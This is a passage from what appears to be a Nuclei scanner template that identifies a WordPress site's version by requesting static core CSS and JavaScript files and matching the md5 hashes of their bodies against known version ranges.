"(\"4435548198f28946ced9fedefd78d486\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.4.24 - dsl: - - "(\"8edc3af2d0b4adaecf9a38b660814af3\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.2 - dsl: - - "(\"3715b37b10edab644542406f0caca236\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"a4c37789b8d4b09535f742dc44ddd7f1\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ce08e4628996a70a5d5deac9221e1130\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"73a10d6e0f9198feeff1a5ef7f377f7f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a5027fd2f1f9732b8a7e873b4e04c209\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"27288c303cd0348b2189a31f28a86939\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"f5cecd61138f60a9b1048feff299ca8b\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"e3a25a3cb6290e46ba89b17a32c62f6c\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"a7f95c97f28986e4f7092dbc8678e9cf\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ae76cc15f6fa1932e745d42c5fe26261\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"57d01c37c53a901c1a276b2e681df784\" == md5(body))" - - type: dsl - name: 3.1 - 3.3.3 - dsl: - - "(\"da9fa8f11020348651fd64858d4705bb\" == md5(body))" - - type: dsl - name: 4.9 - dsl: - - "(\"4dea99610abd3c166d4291d48039211d\" == md5(body))" - - type: dsl - name: 4.9.1 - 5.0.11 - dsl: - - "(\"7f52d864cd927714515906c74582e21b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"76e43e1257cba406e30c224966dc2e5d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"15c7a2d4f4cdac5a7ad33d2f66106258\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0c2e021310bbd9bf031b4d3b42fe0377\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e202e910a7087e7899160f89851b99fa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/widgets.css" - matchers: - - type: dsl - name: 4.8.1 - 4.8.15 - dsl: - - "(\"ef7ad4431fae07bceca3076e9762d135\" == md5(body))" - - type: dsl - name: 4.8 - dsl: - - "(\"d5aa95eb9b8a99353bb0bcd23e585035\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"53bfa004b8ec5ed07348b9ff3e79af55\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"85f24f95f8da242c164ca6de0610e184\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"e9bf39da5e8f7e35eb748389d838d709\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.3.25 - dsl: - - "(\"4aa8d8e3d5d42930d6c7788880431a86\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"4dc79b8deabc48edc3cb04b90633810d\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"ca4d97e656a62052423e53195ff42412\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"56f13b1bab3f517460dab5554e057056\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"8a9b28d7e969543624a0c3c22b1950f9\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"cdada849d89389820c2cb3e18c0a8765\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"da01dd4c0f6a2ef5d110cb4aa3cf394a\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"c4d1ad88ee2a59c096cee1ac30690056\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"0d6834ae4edcd6445a8426f7f6ec6c4e\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"6fb81427ceb258198deac5113ddcb498\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"d45da61a2c6ceb19f07c71aa48dae40a\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"74412c2868056ef2971bee2c271962a8\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"18eac3dce97d2b547263edbbb6d6eb37\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"cf21d93a0c7ef4b4fe265efefa82193f\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.16 - dsl: - - "(\"f3631c4a603a3cf7a8fb36e9d08d6435\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"bf91cac38229762201f530491ba2b604\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"16a2e4ba32a72d469fce4650878b2743\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"652fb07102f908931f36672e1477d233\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2b91a746ea29f9a8ba3c2c0ce4c92259\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8c91a8cfdae3032e7f39e0ba6e93b350\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"44852a3d288d9b8093aab51e4d397871\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/buttons-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"cf359b843c6624dffc39bc093f616237\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"e0e4ffc59213fcab73cd96ac94d0f002\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"18cac60d5d31e37c3070817504c62af3\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"fd0faafb40ed3a5b818deb13eaf45ead\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"6370534afc150761f63d4b5447ce628c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"440f128e2267419185ce47d2f8d0505c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"313eace8c7cc0ef43a877a5e15c8f3bd\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"adf3b5ecfe050b4e66e2a0d08e944444\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"d24d1d1eb3a4b9a4998e4df1761f8b9e\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"fb062ed92b76638c161e80f4a5426586\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"71c13ab1693b45fb3d7712e540c4dfe0\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4ec02ca83e210f35bbaf97fb4ed2a037\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"2f8b834d9d91275dbd682e1ea4dd38cd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"850bd00d787bedbd6d8ea66ab464ec3e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"08dd5ea858d4a994978b75b00a4ded65\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"aba6fa8415824ee5f226b4631627dd1c\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"4238af66b73068824be148b4ce0473b9\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"87941cb9071bb1357623efed51881f18\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"543f7d2253e40f47dcfbf1a1468fc3e8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f9187bd63a056aad59c34bcfd6dfecd5\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"9224fae643e4a459dc42bd5417e966cc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-editor.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"4c69a1599bd6868a31cd43b7f899964d\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"5ec5214a027bf7e38370b75fe6d4b51a\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"2ea5ca0b74bb2b7e36d2a3384ca51c4e\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"20f9f27717e6b1fd22576cdffba06336\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"000059450d81178e0ea9fea810f81859\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"64fab611a72d919d3f73c771ef15445e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e3f82f1cef1efcf97ce21ec854195081\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"29af1d5f15655bad729af42e58aca3f2\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c2c48681543e79a94bb97052b2515b8e\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"916c9db27339c1ca756653466e82cb9c\" == md5(body))" - - type: dsl - name: 3.5.2 - dsl: - - "(\"1cde26c3ff2b26db1728fa937ca3cf2c\" == md5(body))" - - type: dsl - name: 3.5.1 - dsl: - - "(\"e4097e9dea685c3e613e0fc015ba2832\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"2609026f9412e8040a9b968ac127a1aa\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"af1d6c3eb0ea441600d4a7f2ac4c7c4e\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"67730ca56853b59e34256a21239276ba\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"a7a21c718bcad2219b689aff5f3069ce\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"93a84034566188cba3829bf2c5f086e1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview.js" - matchers: - - type: dsl - name: 4.7.4 - 4.8.15 - dsl: - - "(\"619e58942a49b70e1490e19deab325f6\" == md5(body))" - - type: dsl - name: 4.7.3 - dsl: - - "(\"d40869ecf7e2a8f99bf2ec2d69f6e0b5\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"206c000a3d0c598ec471af58684f43e1\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"34a3ec49d6414125c613e87f9a51cf20\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7baba5f606cab24916f7802fd55f2d12\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"25d989447d4cc2930eddf46626aea1d3\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"359d13f4402b1f1d7262e891a46aa636\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"eead944332db05e2cdde148dac2cdabe\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"bc3602ceb3e5a0f05391eb77f48e3155\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"e313328820b62adfcf516062ab6567b4\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"c05d582d250523e033d471c335f32381\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1db4cfab7e31dd1f8b3f168e83fc4eb8\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"9100940268231265441eeec70eaad488\" == md5(body))" - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"617d9fd858e117c7d1d087be168b5643\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"da36bc2dfcb13350c799b62de68dfa4b\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"8ac9f2b666eaa82f047005ba79834f95\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"ed68f9b2b0bc3518687aeb93d4d53950\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ad995d60abf1b0d82d04f731122eed20\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"33510e09fd219d40e18f7fd9a7540d08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/install-rtl.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"9c9f28632838146ea5b1f9de9ac289c8\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"654ac0a0f7a8fe1cd84c0c945b70af0f\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"8d0d5ced4b04e74ebc2d0d330076e9b9\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"271de0780b4ce277539b2029932acd9c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"fc3897e410c67fa0f71e13e0fedc0f0c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"2a0fc0a9434d3aa6abfda715dfe80ca2\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"93340ac2d020159c171ae87c9d0a941b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a8124966cbc8794feb6b9fa52b3b9e76\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"806e003025b3092f2f9eb3026c6d9d38\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"04328c1f971f271dc3618a71a0eee27d\" == md5(body))" - - type: dsl - name: 3.0 - 3.2.1 - dsl: - - "(\"2120500e18667adf1d9d5204b08879da\" == md5(body))" - - type: dsl - name: 2.7 - 2.9.2 - dsl: - - "(\"39eb6cb46f5071727c143ba407b54b53\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"ef923f64828b48c0c6f03a0e42d780b2\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"ab9e254c14787712db65e61d2be6bef7\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"e2c347529384aff550838b13367792a6\" == md5(body))" - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"77b94469c0536617ccf3f128e82629e7\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"3382df7e6ea38b249a7c9e71c72a56e0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"91030e73958b4b1f38ba18dcc85e478d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"3a0184e0737960ae80af99115327cdb5\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"fb9481431bd943229c998da48760401d\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"76d54c1d7bb4bfbca21d7cec56708a88\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.2 - dsl: - - "(\"266c2a68e3ef53c32e87cb86c5167105\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"dda20db0fea7db4eecf55cbcb7aeadda\" == md5(body))" - - type: dsl - name: 5.3.3 - 5.3.6 - dsl: - - "(\"de4f642413c45617556688cb66f92878\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"6ee14a47645d8869019f211aac8fb097\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/plugin.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"1af620877ea34337ec3a558b1f504c2a\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"36cbcbb2f625bb726dfccd3f5b47f253\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"eae90901cd1d4841b2c9df2c26b0a8f7\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"73f3d17b335427a254e49fcddc51149c\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"e608364cb27dcf58e94433c8c3f02518\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"8bdcfc3e4a5a6d512e326df5947cf442\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"b8b5f897d9f7a0a3202d16da58fa8567\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"8f66eb91bd871ee5a1b4e03ba3c18e84\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"3f4eb897c1d10baf088c14dfc1808a22\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"d31c9c63282d58d5a4261f6b7a249f78\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"5b3e602359d9f830634371082916a862\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"7d522c5a28db08bc68c0a215899010a7\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"b8d0d2f9218cfb35658d15d11715ca6c\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.7 - dsl: - - "(\"dee21a1f544d4781bece558fb6a34ce8\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"b46b7cbc7a3548d8bb28a9ae0b08ed9d\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"1453c4441307c2cc637c67710b527e7f\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"0f1c45aeab591060112ce9ff3f7f4ace\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wplink/plugin.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.9.1 - dsl: - - "(\"61b5d1b6099e3e36cc2f73e400cf349c\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"00d304cfb272ef4addbbcb4812c73f98\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"4afced1f9ab8700e47f31367be6fe7f5\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.5 - dsl: - - "(\"9a65c6f6979ef70401b0b919b02e83ec\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"8d578828e03173241c2f2981a78e8d76\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"c402c0d9c448c922371f09f5e8c5acc6\" == md5(body))" - - type: dsl - name: 4.5.3 - 4.5.9 - dsl: - - "(\"73b51b5aa71eb16b933a02283e871064\" == md5(body))" - - type: dsl - name: 4.5.1 - 4.5.2 - dsl: - - "(\"3693e7d995a7dfbcc6ed8f89aac15f9c\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.23 - dsl: - - "(\"0d7894abf7d8addd7139fd53e7d51899\" == md5(body))" - - type: dsl - name: 4.5 - dsl: - - "(\"5039db87abba4481d89e74ec591a761d\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.10 - dsl: - - "(\"0f5e81397f59120b9f53ae708251a7f0\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.24 - dsl: - - "(\"b0b7e2fa90ea37cd9de0489d978d56e2\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.11 - dsl: - - "(\"30d7bde04e460530a72425ee649a16d5\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"dcb6abd9b5957b73706088680f9151d9\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"6f2e2cba06ccf7e1106d1de79b66ae8b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ba2e2243e1870cd1623ed1de4bf95ccb\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"57fc7a21d1df2c4cbc4fb06dd43bdcc6\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"eaf98980a6aa955c848ea2a4688ee878\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"573ccd13990bffbf99e2273deb5b50dd\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.7 - dsl: - - "(\"a2995d1a4e10bf66e1d0a36b6b449424\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"69dd2736db6e8634bbe44998046c1ec9\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"587d485725001ad69b66564ad7f92067\" == md5(body))" - - type: dsl - name: 5.3 - 5.6 - dsl: - - "(\"9fe35a0b1b7b33a545272a5c8d3710b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/wordpress.css" - matchers: - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"7097362cbcf848901a3b2b4403727b74\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"022939487eda7816036ece64e3cc176f\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"de8865129c6b495bd7472a1a2ba96808\" == md5(body))" - - type: dsl - name: 2.5.1 - dsl: - - "(\"225b39da6816d0a7a7f1549ec128dff4\" == md5(body))" - - type: dsl - name: 2.5 - dsl: - - "(\"aa4cb8f641f50e9d33fa6213b7fe7bc9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/global.dev.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"72e8801cc89a0b98141fc2dee9b873c6\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"d3cc587676f09f7e6ae73e6c8e7137b7\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"ab6285553bc272a086b545590d80cc22\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"ea3b8db0abda3026ddbd397d7d8adc84\" == md5(body))" - - type: dsl - name: 2.9.1 - 2.9.2 - dsl: - - "(\"7d6811856205875c098621001f4f698f\" == md5(body))" - - type: dsl - name: 2.9 - dsl: - - "(\"636fbecad6d5bd4bb3e4311c3a272877\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/global-rtl.css" - matchers: - - type: dsl - name: 3.2.1 - dsl: - - "(\"e62b1a3cc3693dfb1dbc9f3c99ee3ee2\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"615061f4d085863ef4eaf0b89eccb59c\" == md5(body))" - - type: dsl - name: 3.0 - 3.1.4 - dsl: - - "(\"1cd613c5e84869f94e5cb5d44f0493ec\" == md5(body))" - - type: dsl - name: 2.9 - 2.9.2 - dsl: - - "(\"0005cc03539e4c0be4bdbc8cf12ba22d\" == md5(body))" - - type: dsl - name: 2.8 - 2.8.6 - dsl: - - "(\"639432085f54f73cc7857d5e6b3fdb22\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"9079a3999a5f5d3d9114380cb0d6628d\" == md5(body))" - - type: dsl - name: 2.6.1 - 2.6.5 - dsl: - - "(\"31b484efa9c7aeaeda48c8dd305ed455\" == md5(body))" - - type: dsl - name: 2.6 - dsl: - - "(\"9dcfffe3f2b12122ab451bc0c48df2ae\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin.dev.css" - matchers: - - type: dsl - name: 3.4.1 - 3.4.2 - dsl: - - "(\"af5f37a886c348054b2fb21bb2c70c7c\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"5c6176761fc0ee644e210b33ba20357f\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"d83a0ec5116bd51468027455caf3c36d\" == md5(body))" - - type: dsl - name: 3.2.1 - dsl: - - "(\"c8b8a4d72181369d2714002093e91c48\" == md5(body))" - - type: dsl - name: 3.2 - dsl: - - "(\"e55e5834423d22b753bc5f27fd90ba4a\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"f242d39c06919885462ee55861b9a859\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"2d11b980a3db81f466f9129a9a642c2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/customize-controls.dev.js" - matchers: - - type: dsl - name: 3.4.2 - dsl: - - "(\"4be2481e0d8960e317486394c2e5186f\" == md5(body))" - - type: dsl - name: 3.4.1 - dsl: - - "(\"f518a6c4b341dcad34ca7f5145485923\" == md5(body))" - - type: dsl - name: 3.4 - dsl: - - "(\"170885b4ee7eb66ed4220332d4b3e370\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/wp-admin-rtl.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"06dd9aaea22ad8c13722470196c5aab4\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"92b1d910730c03ead0d0113d7cd01fbb\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"f77e30fb3963f31a628ad369fc71ad37\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"a6d4e8c9cf807f9aa705a886020d93f6\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.29 - dsl: - - "(\"c68975fa2fc16fd96051530fb230668c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"030caf3660328d0bb366809887d33a2a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"081731ce01b46738e7adef8298ce8317\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"4c2bbf4f1b085d161cd0b9ec95d962a5\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"f702228e2b2b7d81ea2d68bcf94b94da\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"4fcf0cc06914368854e8d3956d67701d\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"c1c470fd221acba9da73357892b3fed0\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"dc555dec7552e1b6da150c8ffeba9d72\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"990c061c85fc81736b9c6befac3b5c77\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"738cb6605cfba84eb49b8e5fe88e897f\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"f9c6007ccbff118e5f77a60127c9121c\" == md5(body))" - - type: dsl - name: 4.9 - 5.1.8 - dsl: - - "(\"9ff8672a8c72aecf01e6efa72daf2458\" == md5(body))" - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"47835135274559ad6fe230b67dc65fc7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"a86bc93cbddb1a2b44fb30a46f66a8ad\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"164c87f2a9052670f8342f871a4fadaf\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3beeca0b321ae3e5e4502bbb6553808f\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"26942f6cfb2da2970477af44cd17938f\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"d4656da83c9bd1b862f7e067b50cefed\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"f146885900f710c867cd48f030851e97\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"dfb747b363e0d019c519b7a8bada6efc\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"143f424d05b81aafe90c22c8f757f53a\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"43fff36c3953279f711afdf374644dbd\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"17aae68019209c421bfa960a427905e2\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"47052b31a7383be79e9c16ea0d12bead\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"9202d951edc7a3584b9f90263e11f848\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"88e9ab4f522932e1726bddd3b9f6b0e7\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a16fb470df8691314021ea5e1535bf4e\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - 